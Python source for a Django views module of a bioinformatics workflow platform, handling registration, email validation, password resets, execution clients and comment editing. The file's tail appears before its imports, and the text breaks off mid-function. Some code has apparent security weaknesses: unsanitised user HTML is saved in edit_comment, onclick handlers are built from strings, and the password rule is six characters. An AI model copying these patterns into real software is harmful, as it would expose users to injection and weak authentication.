return fail('Error 2871')
ret = {
'html': markdown(text),
}
return success(ret)
@has_data
def edit_comment(request, **kwargs):
'''
url: edit_comment/
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote comments')
if not user_is_validated(request):
return fail('Please validate your email to edit the comment.' + validate_toast_button());
comment_id = int(kwargs['comment_id'])
new_html = kwargs['new_html']
is_root = kwargs['is_root']
comment_type = kwargs.get('comment_type')
# Get the comment
comment = Comment.objects.get(pk=comment_id)
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
if comment.obc_user.id != obc_user.id:
return fail("You don't have the permission to edit this comment!")
if not is_root:
comment.comment = markdown(new_html)
comment.comment_html = new_html
if comment_type in ['solution', 'note', 'agree', 'disagree']:
comment.opinion = comment_type
else:
comment.title = new_html
comment.save()
ret = {
'message': 'The comment has been updated!'
}
return success(ret)
### END OF Q&A
### VIEWS END ###### |
# Django imports
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings # Access to project settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth import login as django_login # To distinguish from AJAX called login
from django.contrib.auth import logout as django_logout # To distinguish from AJAX called logout
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.validators import URLValidator
from django.core.mail import send_mail
from django.db.models import Q # https://docs.djangoproject.com/en/2.1/topics/db/queries/#complex-lookups-with-q-objects
from django.db.models import Max # https://docs.djangoproject.com/en/2.1/topics/db/aggregation/
from django.db.models import Count # https://stackoverflow.com/questions/7883916/django-filter-the-model-on-manytomany-count
from django.utils import timezone
#from django.utils.html import escape # https://docs.djangoproject.com/en/2.2/ref/utils/#module-django.utils.html
from django.views.decorators.csrf import csrf_exempt # https://stackoverflow.com/questions/17716624/django-csrf-cookie-not-set/51398113
# Get csrf_token
# https://stackoverflow.com/questions/3289860/how-can-i-embed-django-csrf-token-straight-into-html
from django.middleware.csrf import get_token
#Import database objects
from app.models import OBC_user, Tool, Workflow, Variables, ToolValidations, \
OS_types, Keyword, Report, ReportToken, Reference, ReferenceField, Comment, \
UpDownCommentVote, UpDownToolVote, UpDownWorkflowVote, ExecutionClient
from app.models import create_nice_id
#Import executor
from ExecutionEnvironment.executor import create_bash_script, OBC_Executor_Exception
# Email imports
import smtplib
from email.message import EmailMessage
# System imports
import io
import os
import re
import six
import time # for time.sleep
import uuid
import hashlib
#import datetime # Use timezone.now()
import logging # https://docs.djangoproject.com/en/2.1/topics/logging/
from collections import Counter, defaultdict
import urllib.parse # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3/40557716
# Installed packages imports
import simplejson
from ansi2html import Ansi2HTMLConverter # https://github.com/ralphbean/ansi2html/
#https://pybtex.org/
from pybtex.database import parse_string as parse_reference_string
import pybtex.database.input.bibtex
import pybtex.plugin
import requests # Used in DOI resolution
# https://github.com/lepture/mistune
import mistune
__version__ = '0.1.7rc'
# Get an instance of a logger
logger = logging.getLogger(__name__)
#GLOBAL CONSTANTS
g = {
'SERVER': 'https://www.openbio.eu',
'EMAIL': 'info@swww.openbio.eu',
'ADMIN': 'kantale@ics.forth.gr', # In case the email fail, use this instead
'DEFAULT_DEBUG_PORT': 8200,
'SEARCH_TOOL_TREE_ID': '1',
'DEPENDENCY_TOOL_TREE_ID': '2',
'VARIABLES_TOOL_TREE_ID': '3',
'SEARCH_WORKFLOW_TREE_ID': '4',
'SEARCH_REPORT_TREE_ID': '5',
'format_time_string' : '%a, %d %b %Y %H:%M:%S', # RFC 2822 Internet email standard. https://docs.python.org/2/library/time.html#time.strftime # '%Y-%m-%d, %H:%M:%S'
'instance_settings' : {
'cb62fc6f-f203-4525-bf40-947cbf51bda3': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
'341422c9-36c4-477e-81b7-26a76c77dd9a': {
'port': 8201,
'controller_url': 'http://139.91.190.79:8081/post'
},
'default': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
},
'instance_setting_not_found_printed': False,
'ansi2html_converter': Ansi2HTMLConverter(), # https://github.com/ralphbean/ansi2html/
'markdown': mistune.Markdown(escape=True), # If you care about performance, it is better to re-use the Markdown instance:
# escape=True should be the default option for mistune...
# 'pybtex': {
# 'pybtex_style': pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')(),
# 'pybtex_html_backend': pybtex.plugin.find_plugin('pybtex.backends', 'html')(),
# 'pybtex_parser': pybtex.database.input.bibtex.Parser()
# }
# materialize js tree icons
# https://materializecss.com/icons.html
'jstree_icons': {
'tools': 'settings',
'variables': 'chevron_right', # Tool variables
'workflows': 'device_hub',
'reports': 'description',
'references': 'link',
'users': 'person',
'qas': 'forum',
},
'url_validator': URLValidator(), # Can be customized: URLValidator(schemes=('http', 'https', 'ftp', 'ftps', 'rtsp', 'rtmp'))
'client_name_regex': r'^[\w]+$', # The regular expression to validate the name of exutation client
'client_max': 10, # Max number of execution clients
# Create the URL for the report generated in the OBC client
'create_client_download_report_url': lambda client_url, nice_id : urllib.parse.urljoin(client_url + '/', 'download/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_download_log_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'logs/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_check_status_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'check/id/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_pause_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/true'.format(NICE_ID=nice_id)),
'create_client_resume_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/false'.format(NICE_ID=nice_id)),
'create_client_abort_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/delete/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_airflow_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'admin/airflow/graph?dag_id={NICE_ID}&execution_date='.format(NICE_ID=nice_id)),
}
### HELPING FUNCTIONS AND DECORATORS #####
def md5(t):
'''
Return the md5 hash of this string
'''
return hashlib.md5(t.encode("utf-8")).hexdigest()
def valid_url(url):
'''
Is url valid?
Uses django's URLvalidator
'''
try:
g['url_validator'](url)
except ValidationError:
return False
else:
return True
def user_is_validated(request):
'''
Is the email of the user validated?
Returns True/False
'''
if request.user.is_anonymous:
#print ('User is anonymous')
return False
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
#print ('User does not exist')
return False # This should never happen
ret = obc_user.email_validated
#print ('User is validated:', ret)
return ret
def resolve_doi(doi):
'''
https://gist.github.com/jrsmith3/5513926
Return a bibTeX string of metadata for a given DOI.
Used in references_process_doi
'''
url = "http://dx.doi.org/" + doi
headers = {"accept": "application/x-bibtex"}
r = requests.get(url, headers = headers)
if r.status_code == requests.codes.ok:
return r.text
return None
def replace_interlinks(text):
'''
Search for interlinks and replace with javascript calls
'''
ret = text
def javascript_call(matched_string, arguments):
'''
Create the javascript call
'''
func_call = '''window.OBCUI.interlink({});'''.format(simplejson.dumps(arguments))
pattern = '''<a href="javascript:void(0);" onclick='{}'>{}</a>'''.format(func_call, matched_string)
return pattern
interlink_options = {
'tools': {
'findall': r'[^\w]([td]/[\w]+/[\w\.]+/[\d]+)',
'arguments': r'(?P<type>[td])/(?P<name>[\w]+)/(?P<version>[\w\.]+)/(?P<edit>[\d]+)',
'exists': lambda arguments: Tool.objects.filter(name__iexact=arguments['name'], version__iexact=arguments['version'], edit=int(arguments['edit'])).exists()
},
'workflows': {
'findall': r'[^\w](w/[\w]+/[\d]+)',
'arguments': r'(?P<type>w)/(?P<name>[\w]+)/(?P<edit>[\d]+)',
'exists': lambda arguments: Workflow.objects.filter(name__iexact=arguments['name'], edit=int(arguments['edit'])).exists()
},
'references': {
'findall': r'[^\w](r/[\w]+)',
'arguments': r'(?P<type>r)/(?P<name>[\w]+)',
'exists': lambda arguments: Reference.objects.filter(name__iexact=arguments['name']).exists()
},
'users': {
'findall': r'[^\w](u/[\w]+)',
'arguments': r'(?P<type>u)/(?P<username>[\w]+)',
'exists': lambda arguments: OBC_user.objects.filter(user__username__iexact=arguments['username']).exists()
},
'comment': {
'findall': r'[^\w](c/[\d]+)',
'arguments': r'(?P<type>c)/(?P<id>[\d]+)',
'exists': lambda arguments: Comment.objects.filter(pk=int(arguments['id'])).exists()
}
}
for interlink_key, interlink_value in interlink_options.items():
calls = set(re.findall(interlink_value['findall'], ' ' + text)) # We add a space (' ') so that we catch interlinks at the beginning of string
for call in calls:
#print ('call:', call)
#print ('regexp:', interlink_value['arguments'])
arguments = re.search(interlink_value['arguments'], call).groupdict()
if interlink_value['exists'](arguments):
ret = ret.replace(call, javascript_call(call, arguments))
# tool_calls = set(re.findall(interlink_options['tools']['findall'], text))
# for tool_call in tool_calls:
# arguments = re.search(interlink_options['tools']['arguments'], tool_call).groupdict()
# # Does this tool exists?
# if Tool.objects.filter(name=arguments['name'], version=arguments['version'], edit=arguments['edit']).exists():
# ret = ret.replace(tool_call, javascript_call(tool_call, arguments))
return ret
def markdown(t):
'''
https://github.com/lepture/mistune
'''
md = g['markdown'](t)
# Remove <p> at the start and </p> at the end
s = re.search(r'^<p>(.*)</p>\n$', md, re.M | re.S)
if s:
ret = s.group(1)
else:
ret = md
# Check for interlinks
ret = replace_interlinks(ret)
return ret
def jstree_icon_html(t):
'''
Create a html tags for materialize icon
'''
return '<i class="material-icons jsTreeMaterialIcons left md-18">{}</i>'.format(g['jstree_icons'][t])
def fail(error_message=None):
'''
Failed AJAX request
'''
ret = {'success': False, 'error_message': error_message}
json = simplejson.dumps(ret)
return HttpResponse(json, content_type='application/json')
def success(data={}):
'''
success Ajax request
'''
data['success'] = True
json = simplejson.dumps(data)
return HttpResponse(json, content_type='application/json')
def has_data(f):
'''
Decorator that passes AJAX data to a function parameters
'''
def wrapper(*args, **kwargs):
request = args[0]
if request.method == 'POST':
if len(request.POST):
for k in request.POST:
kwargs[k] = request.POST[k]
else:
try:
POST = simplejson.loads(request.body)
except simplejson.errors.JSONDecodeError as e:
return fail('Could not parse JSON data')
for k in POST:
kwargs[k] = POST[k]
elif request.method == 'GET':
for k in request.GET:
kwargs[k] = request.GET[k]
#print ("GET: {} == {}".format(k, kwargs[k]))
return f(*args, **kwargs)
return wrapper
def username_exists(username):
'''
Checks if a username exists
'''
return User.objects.filter(username__iexact=username).exists()
def datetime_to_str(d):
'''
String format
'''
return d.strftime(g['format_time_string'])
def convert_ansi_to_html(ansi):
'''
Create a nice standalone html page from stdout
https://github.com/ralphbean/ansi2html/
'''
return g['ansi2html_converter'].convert(ansi)
def create_uuid_token():
'''
Create a uuid token for email validation
Length: 32 characters
'''
# return str(uuid.uuid4()).split('-')[-1] # Last part: 12 characters
return str(uuid.uuid4()).replace('-', '') # 32 characters
def uuid_is_valid(uuid_token):
'''
https://gist.github.com/ShawnMilo/7777304
'''
try:
val = uuid.UUID(uuid_token, version=4)
except ValueError:
return False
return val.hex == uuid_token.replace('-', '')
def send_mail_smtplib(from_, to, subject, body):
'''
Standard email send function with SMTP
Adjusted from here:
https://docs.python.org/3/library/email.examples.html
NOT USED!
'''
msg = EmailMessage()
msg.set_content(body)
msg['Subject'] = subject
msg['From'] = from_
msg['To'] = to
s = smtplib.SMTP('localhost') # Send the message via our own SMTP server.
s.send_message(msg)
s.quit()
def request_port_to_url(request):
'''
Do we have to append a url with the port?
'''
port = request.META['SERVER_PORT'] # This is a string
if port in ['80', '443']: # Do not add port info when http default or https default
return ''
return ':' + port # For example ':8080'
def create_validation_url(token, port=''):
'''
https://stackoverflow.com/a/5767509/5626738
http://www.example.com/?param1=7¶m2=seven.
FIXME: "platform" should be derived from request.
SEE: https://stackoverflow.com/questions/2491605/how-to-get-the-current-url-name-using-django
'''
ret = '{server}{port}/platform/?validation_token={token}'.format(server=g['SERVER'], token=token, port=port)
return ret
def create_password_email_url(token, port=''):
'''
See also create_validation_url for FIXME issue
'''
ret = '{server}{port}/platform/?password_reset_token={token}'.format(server=g['SERVER'], token=token, port=port)
return ret
def confirm_email_body(token, port=''):
'''
The mail verification mail body
'''
ret = '''
Thank you for signing up to {server}
To complete your registration please click (or copy-paste to your browser) the following link:
{validation_url}
Regards,
The openbio.eu admin team.
'''
return ret.format(server=g['SERVER'], validation_url=create_validation_url(token, port))
def reset_password_email_body(token, port=''):
'''
The email for resetting a password
'''
ret = '''
Dear user,
Someone (hopefully you) has requested to reset the password at {server} .
If this is you, please go to the following link to complete the process:
{password_reset_url}
Otherwise please ignore this email!
Regards,
The openbio.eu admin team.
'''
return ret.format(server=g['SERVER'], password_reset_url=create_password_email_url(token, port))
def validate_user(token):
'''
Validates a user
Returns: True/False, message
'''
try:
obc_user = OBC_user.objects.get(email_validation_token=token)
except ObjectDoesNotExist:
obc_user = None
if obc_user:
if obc_user.email_validated:
return False, "User's email is already validated"
else:
#Validate user
obc_user.email_validated = True
#Delete validation token
obc_user.email_validation_token = None
obc_user.save()
return True, 'Email successfully validated'
else:
return False, 'Unknown or deleted email validation token'
def password_reset_check_token(token):
'''
Check the token for password reset
'''
try:
obc_user = OBC_user.objects.get(password_reset_token=token)
except ObjectDoesNotExist:
obc_user = None
if obc_user:
timestamp = obc_user.password_reset_timestamp
seconds = (now() - timestamp).total_seconds()
if seconds > 3600 * 2: # 2 Hours
return False, 'Password Reset Token expires after 2 Hours', None
else:
return True, '', obc_user
else:
return False, "Unknown token", None
def now():
'''
https://stackoverflow.com/a/415519/5626738
https://stackoverflow.com/questions/18622007/runtimewarning-datetimefield-received-a-naive-datetime
'''
#return datetime.datetime.now()
return timezone.now()
def check_password(password):
'''
Check for password correctness
'''
if len(password) < 6:
return False, 'Minimum password length is 6'
return True, ''
def send_validation_email_inner(request, email):
'''
Send an email validation email
Returns
suc, error_message, uuid_token
'''
uuid_token = create_uuid_token()
if settings.DEBUG:
#print ('VALIDATION EMAIL TOKEN:', uuid_token)
#print ('URL: http://0.0.0.0:{}/platform/?validation_token={}'.format(request.META['SERVER_PORT'], uuid_token))
return True, '', uuid_token
try:
send_mail(
'[{server}] Please confirm your email'.format(server=g['SERVER']), # subject
confirm_email_body(uuid_token, port=request_port_to_url(request)), # body message
g['EMAIL'], # Sender, FROM
[email], # List of recipients
)
except Exception as e:
return False, 'Could not send an email to {email}. Contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']), None # Better to add None
return True, '', uuid_token
def None_if_empty_or_nonexisting(d, key):
'''
Useful if want to set None values to empty values that we got from Ajax
'''
if not key in d:
return None
value = d[key].strip()
if not value:
return None
return value
def tool_to_json(tool):
if not tool:
return None
return {
'name': tool.name,
'version': tool.version,
'edit': tool.edit,
}
def workflow_to_json(workflow):
if not workflow:
return None
return {
'name': workflow.name,
'edit': workflow.edit,
}
def tool_text_jstree(tool):
'''
The JS tree tool text
The id should have 4 fields.
'''
return '/'.join(map(str, [tool.name, tool.version, tool.edit]))
def tool_node_jstree(tool):
'''
The HTML that is node in a jstree that contains a tool
'''
return tool_text_jstree(tool) + (' <span class="red lighten-3">DRAFT</span>' if tool.draft else '') + jstree_icon_html('tools'),
def workflow_text_jstree(workflow):
'''
The JS tree workflow text
'''
return '/'.join(map(str, [workflow.name, workflow.edit]))
def workflow_node_jstree(workflow):
'''
The HTML that is node in a jstree that contains a workflow
'''
return workflow_text_jstree(workflow) + (' <span class="red lighten-3">DRAFT</span>' if workflow.draft else '') + jstree_icon_html('workflows')
def report_text_jstree(report):
'''
The JS tree report text
'''
return workflow_text_jstree(report.workflow) + '/' + report.nice_id
def tool_id_jstree(tool, id_):
'''
The JS tree tool id
Return a JSON string so that it can have many fields
'''
#return tool_text_jstree(tool) + '/' + str(id_)
return simplejson.dumps([tool.name, tool.version, str(tool.edit), str(id_)])
def tool_id_cytoscape(tool):
'''
The cytoscape tool id
'''
if isinstance(tool, Tool):
return '__'.join([tool.name, tool.version, str(tool.edit), g['DEPENDENCY_TOOL_TREE_ID']])
elif type(tool) is dict:
return '__'.join([tool['name'], tool['version'], str(tool['edit']), g['DEPENDENCY_TOOL_TREE_ID']])
else:
raise Exception('Error: 8151')
def step_id_cytoscape(step_name, workflow, name, edit):
'''
cytoscape step id
'''
return 'step' + '__' + step_name + '__' + workflow_id_cytoscape(workflow, name, edit)
def step_id_label(step_name):
'''
cytoscape step label
'''
return step_name
def tool_label_cytoscape(tool):
'''
The cytoscape tool label
'''
if isinstance(tool, Tool):
return '/'.join([tool.name, tool.version, str(tool.edit)])
elif type(tool) is dict:
return '/'.join([tool['name'], tool['version'], str(tool['edit'])])
else:
raise Exception('Error: 9810')
def workflow_id_cytoscape(workflow, name, edit):
'''
The cytoscape workflow id
'''
if type(workflow) is dict:
return workflow['name'] + '__' + str(workflow['edit'])
if workflow:
return workflow.name + '__' + str(workflow.edit)
return name + '__' + str(edit)
def workflow_label_cytoscape(workflow, name, edit):
'''
The cytoscape workflow label
'''
if workflow:
return workflow.name + '/' + str(workflow.edit)
return name + '/' + str(edit)
def workflow_id_jstree(workflow, id_):
'''
The JS Tree workflow id
Return a JSON string so that it can have many fields
'''
return simplejson.dumps([workflow.name, str(workflow.edit), str(id_)])
def report_id_jstree(report, id_):
'''
The JS Tree Report id
Return a JSON string so that it can have many fields
'''
return simplejson.dumps([report.workflow.name, str(report.workflow.edit), str(report.nice_id), str(id_)])
def tool_variable_node_jstree(variable):
'''
The JSTree variable html
'''
return '{}:{}'.format(variable.name, variable.description) + jstree_icon_html('variables')
def tool_variable_id_jstree(variable, tool, id_):
'''
The JSTree variable id
Returns a JSON string, so that it can have many fields.
It also contains information from the tool
'''
#return variable.name + '/' + variable.value + '/' + variable.description + '/' + str(id_)
return simplejson.dumps([
variable.name, variable.value, variable.description,
str(id_),
tool.name, tool.version, tool.edit])
def tool_get_dependencies_internal(tool, include_as_root=False):
'''
Get the dependencies of this tool in a flat list
Recursive
include_as_root: Should we add this tool as root?
'dependant' needs dependencies..
'''
if include_as_root:
ret = [{'dependant': None, 'dependency': tool}]
else:
ret = []
for dependent_tool in tool.dependencies.all():
ret.append({
'dependant': tool,
'dependency': dependent_tool
})
ret.extend(tool_get_dependencies_internal(dependent_tool, include_as_root=False))
return ret
def tool_build_dependencies_jstree(tool_dependencies, add_variables=False, add_installation_commands=False):
'''
Build JS TREE from tool_dependencies
add_variables: Also add tool/data variables
add_installation_commands: All installation_commands + validation_commands + os_choices
ATTENTION: THIS IS NOT GENERIC!!!
IT uses g['DEPENDENCY_TOOL_TREE_ID'].
'''
tool_dependencies_jstree = []
for tool_dependency in tool_dependencies:
to_append = {
'data': {
# 'name': tool_dependency['dependency'].name,
# 'version': tool_dependency['dependency'].version,
# 'edit': tool_dependency['dependency'].edit,
'type': 'tool',
},
'text': tool_node_jstree(tool_dependency['dependency']), # tool_text_jstree(tool_dependency['dependency']), # This is what is shown on the tree
'cy_label': tool_label_cytoscape(tool_dependency['dependency']), # Label to show in the cytoscape graph
'id': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']), # This is a unique id
'parent': tool_id_jstree(tool_dependency['dependant'], g['DEPENDENCY_TOOL_TREE_ID']) if tool_dependency['dependant'] else '#',
'type': 'tool', ### This is redundant with ['data']['type'], but we need it because
### The node[0].data.type is checked in $scope.tools_var_jstree_model.
### See also issue #93
'name': tool_dependency['dependency'].name,
'version': tool_dependency['dependency'].version,
'edit': tool_dependency['dependency'].edit,
'draft': tool_dependency['dependency'].draft,
}
if add_installation_commands:
to_append['installation_commands'] = tool_dependency['dependency'].installation_commands
to_append['validation_commands'] = tool_dependency['dependency'].validation_commands
to_append['os_choices'] = [choice.os_choices for choice in tool_dependency['dependency'].os_choices.all()]
to_append['dependencies'] = [str(t) for t in tool_dependency['dependency'].dependencies.all()]
tool_dependencies_jstree.append(to_append)
# Add the variables of this tool
if add_variables:
for variable in tool_dependency['dependency'].variables.all():
tool_dependencies_jstree.append({
'data': {
'type': 'variable',
'name': variable.name,
'value': variable.value,
'description': variable.description,
},
'text': tool_variable_node_jstree(variable),
'id': tool_variable_id_jstree(variable, tool_dependency['dependency'], g['VARIABLES_TOOL_TREE_ID']),
'parent': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']),
'type': 'variable', # TODO: FIX REDUNDANCY WITH ['data']['type']
})
return tool_dependencies_jstree
### HELPING FUNCTIONS AND DECORATORS END #######
### VIEWS ############
def get_instance_settings():
'''
Gets the id of this local installation
We are running multiple server instances for development
Each instance should have their own port
'''
if not os.path.exists('id.txt'):
if not g['instance_setting_not_found_printed']:
logger.warning('Could not find id.txt setting default')
g['instance_setting_not_found_printed'] = True
return g['instance_settings']['default']
with open('id.txt') as f:
this_id = f.read().strip()
return g['instance_settings'][this_id]
### USERS
@has_data
def users_search_3(request, **kwargs):
'''
Get profile info for a single user.
This is called from:
* Click on profile
* Click on a user node in left panel jstree
'''
username = kwargs.get('username', '')
if not username:
return fail('Could not get username')
try:
u = OBC_user.objects.get(user__username__iexact=username)
except ObjectDoesNotExist as e:
return fail('Could not find user with this username')
ret = {
'profile_username': username,
'profile_firstname': u.first_name,
'profile_lastname': u.last_name,
'profile_website': u.website,
'profile_affiliation': u.affiliation,
'profile_publicinfo': u.public_info,
'profile_created_at': datetime_to_str(u.user.date_joined), # https://docs.djangoproject.com/en/2.2/ref/contrib/auth/#django.contrib.auth.models.User.date_joined
}
# only for registered user:
# * get mail
# * get ExecutionClients
if username == request.user.username:
ret['profile_email'] = u.user.email
ret['profile_clients'] = [{'name': client.name, 'client': client.client} for client in u.clients.all()]
else:
ret['profile_email'] = ''
return success(ret)
@has_data
def user_add_client(request, **kwargs):
'''
Called from $scope.profile_add_client when user adds a new Execution Client
URL: user_add_client/
'''
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8619'); # This should never happen
#Get and validate the name
name = kwargs.get('name', '')
if not re.match(g['client_name_regex'], name):
return fail('Invalid client name (allowed characters, a-z, A-Z, 0-9, _)')
# Get and validate the client
client = kwargs.get('client', '')
if not valid_url(client):
return fail('URL is invalid')
# Check that the name and the client does not exist and that maximum number has not been reached
existing_clients = [{'name':x.name, 'client': x.client} for x in obc_user.clients.all()]
if len(existing_clients) >= g['client_max']:
return fail('Maximum number of Execution Clients has been reached')
existing_names = {x['name'] for x in existing_clients}
existing_urls = {x['client'] for x in existing_clients}
if name in existing_names:
return fail('There is already an Execution Client with this name')
if client in existing_urls:
return fail('There is already an Execution Client with this URL')
## Add the execution environment
new_execution_client = ExecutionClient(name=name, client=client)
new_execution_client.save()
obc_user.clients.add(new_execution_client)
# Return all the profile clients
ret = {
'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
}
obc_user.save()
return success(ret)
@has_data
def user_delete_client(request, **kwargs):
'''
Called from $scope.profile_delete_client
URL: user_delete_client
'''
name = kwargs.get('name', '')
if not name:
return fail('Error 3498')
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8686'); # This should never happen
# Get the Execution Client
try:
ec = ExecutionClient.objects.get(obc_user=obc_user, name=name)
except ObjectDoesNotExist as e:
return fail('Error 4555')
# Delete the Execution Client
ec.delete()
# Return all the profile clients
ret = {
'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
}
return success(ret)
@has_data
def users_edit_data(request, **kwargs):
'''
Called by users_edit_data/
Edit user's profile data
'''
username = kwargs.get('username', '')
if not username:
return fail('Could not get username')
try:
obc_user = OBC_user.objects.get(user__username=username)
except ObjectDoesNotExist as e:
return fail('Could not find user with this username')
obc_user.first_name = kwargs.get('profile_firstname', '')
obc_user.last_name = kwargs.get('profile_lastname', '')
website = kwargs.get('profile_website', '')
if website:
if not valid_url(website):
return fail('website is not a valid URL')
obc_user.website = website
obc_user.affiliation = kwargs.get('profile_affiliation', '')
obc_user.public_info = kwargs.get('profile_publicinfo', '')
#Save edits
obc_user.save()
#Confirm by getting new data
return users_search_3(request, **kwargs)
def users_search_2(
main_search,
):
'''
Collect all users from main search
'''
username_Q = Q(user__username__icontains=main_search)
affiliation_Q = Q(affiliation__icontains=main_search)
publicinfo_Q = Q(public_info__icontains=main_search)
results = OBC_user.objects.filter(username_Q | affiliation_Q | publicinfo_Q)
users_search_jstree = []
for result in results:
to_add = {
'data': {'username': result.user.username},
'text': result.user.username + jstree_icon_html('users'),
'id': result.user.username,
'parent': '#',
'state': { 'opened': True},
}
users_search_jstree.append(to_add)
ret = {
'main_search_users_number': results.count(),
'users_search_jstree': users_search_jstree,
}
return ret
def get_scheme(request):
'''
https://stackoverflow.com/a/36817763/5626738
http or https ?
'''
scheme = 'https' if request.is_secure() else "http"
return scheme
def get_server_url(request):
'''
Get the URL of the server
'''
return '{}://{}/platform'.format(get_scheme(request), request.get_host())
def get_execution_clients(request):
'''
Get all execution clients of the user
'''
if request.user.is_anonymous:
return []
obc_user = OBC_user.objects.get(user=request.user)
ret = list(obc_user.clients.values('client', 'name'))
return ret
def get_execution_clients_angular(request):
'''
Angular excepts an empty entry at the end
'''
return get_execution_clients(request) + [{'name': '', 'client': ''}];
### END OF USERS
def index(request, **kwargs):
'''
View url: ''
'''
#print ('kwargs')
#print (kwargs)
context = {}
context['general_alert_message'] = ''
context['general_success_message'] = ''
# Are we linking to a specific RO?
init_interlink_args = {}
# tool linking
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = kwargs.get('tool_edit', 0)
if tool_name and tool_version and tool_edit:
if Tool.objects.filter(name=tool_name, version=tool_version, edit=int(tool_edit)).exists():
init_interlink_args = {
'type': 't',
'name': tool_name,
'version': tool_version,
'edit': int(tool_edit),
}
else:
context['general_alert_message'] = 'Tool {}/{}/{} does not exist'.format(tool_name, tool_version, tool_edit)
# workflow linking
workflow_name = kwargs.get('workflow_name', '')
workflow_edit = kwargs.get('workflow_edit', 0)
if workflow_name and workflow_edit:
if Workflow.objects.filter(name=workflow_name, edit=int(workflow_edit)).exists():
init_interlink_args = {
'type': 'w',
'name': workflow_name,
'edit': int(workflow_edit),
}
else:
context['general_alert_message'] = 'Workflow {}/{} does not exist'.format(workflow_name, workflow_edit)
#references linking
reference_name = kwargs.get('reference_name', '')
if reference_name:
if Reference.objects.filter(name__iexact=reference_name).exists():
init_interlink_args = {
'type': 'r',
'name': reference_name,
}
else:
context['general_alert_message'] = 'Reference {} does not exist'.format(reference_name)
# user linking
user_username = kwargs.get('user_username', '')
if user_username:
if OBC_user.objects.filter(user__username=user_username).exists():
init_interlink_args = {
'type': 'u',
'username': user_username,
}
else:
context['general_alert_message'] = 'User {} does not exist'.format(user_username)
# comment link
comment_id = kwargs.get('comment_id', '')
if comment_id:
if Comment.objects.filter(pk=int(comment_id)).exists():
init_interlink_args = {
'type': 'c',
'id': int(comment_id),
}
else:
context['general_alert_message'] = 'Comment with id={} does not exist'.format(comment_id)
# Report link
report_run = kwargs.get('report_run', '')
if report_run:
if Report.objects.filter(nice_id=report_run).exists():
init_interlink_args = {
'type': 'report',
'run': report_run,
}
else:
context['general_alert_message'] = 'Report {} does not exist'.format(report_run)
context['init_interlink_args'] = simplejson.dumps(init_interlink_args)
# Is this user already logged in?
# https://stackoverflow.com/questions/4642596/how-do-i-check-whether-this-user-is-anonymous-or-actually-a-user-on-my-system
if request.user.is_anonymous:
#print ('User is anonumous')
username = ''
else:
username = request.user.username
#print ('Username: {}'.format(username))
context['username'] = username
context['password_reset_token'] = ''
context['reset_signup_username'] = ''
context['reset_signup_email'] = ''
#Check for GET variables
GET = request.GET
# EMAIL VALIDATION
validation_token = GET.get('validation_token', '')
if validation_token:
validation_success, validation_message = validate_user(validation_token)
if validation_success:
context['general_success_message'] = validation_message
else:
context['general_alert_message'] = validation_message
#Is user validated
context['user_is_validated'] = user_is_validated(request)
# PASSWORD RESET
password_reset_token = GET.get('password_reset_token', '')
context['password_reset_token'] = '' # It will be set after checks
if password_reset_token:
password_reset_check_success, password_reset_check_message, obc_user = password_reset_check_token(password_reset_token)
if password_reset_check_success:
context['password_reset_token'] = password_reset_token
context['reset_signup_username'] = obc_user.user.username
context['reset_signup_email'] = obc_user.user.email
else:
context['general_alert_message'] = password_reset_check_message
# Show warning when running in default Django port
port = int(request.META['SERVER_PORT'])
if settings.DEBUG:
# Running with DEBUG True
if port == 8000:
logger.warning('WARNING: YOU ARE RUNNING IN DEFAULT DJANGO PORT (8000)')
if port != g['DEFAULT_DEBUG_PORT']:
logger.warning(f'WARNING: You are not runining on port {g["DEFAULT_DEBUG_PORT"]}')
context['debug'] = settings.DEBUG # If this is True, then we include tests.js
# Add port information or other insrtance settings on template
instance_settings = get_instance_settings()
context['port'] = instance_settings['port']
context['controller_url'] = instance_settings['controller_url']
# Get OS choices
context['os_choices'] = simplejson.dumps(OS_types.get_angular_model());
# Get User clients
context['profile_clients'] = get_execution_clients_angular(request)
# Add version
context['version'] = __version__
return render(request, 'app/index.html', context)
@has_data
def register(request, **kwargs):
'''
View url: 'register/'
add user add
'''
if not 'signup_username' in kwargs:
return fail('username is required')
signup_username = kwargs['signup_username']
if not re.match(r'^\w+$', signup_username):
return fail('username can only contain alphanumeric characters')
if username_exists(signup_username):
return fail('username: {} exists already'.format(signup_username))
if not 'signup_password' in kwargs:
return fail('password is required')
signup_password = kwargs['signup_password']
check_password_success, check_password_message = check_password(signup_password)
if not check_password_success:
return fail(check_password_message)
if not 'signup_confirm_password' in kwargs:
return fail('confirm password is required')
signup_confirm_password = kwargs['signup_confirm_password']
if signup_password != signup_confirm_password:
return fail('Confirm password does not match password')
if not 'signup_email' in kwargs:
return fail('email is required')
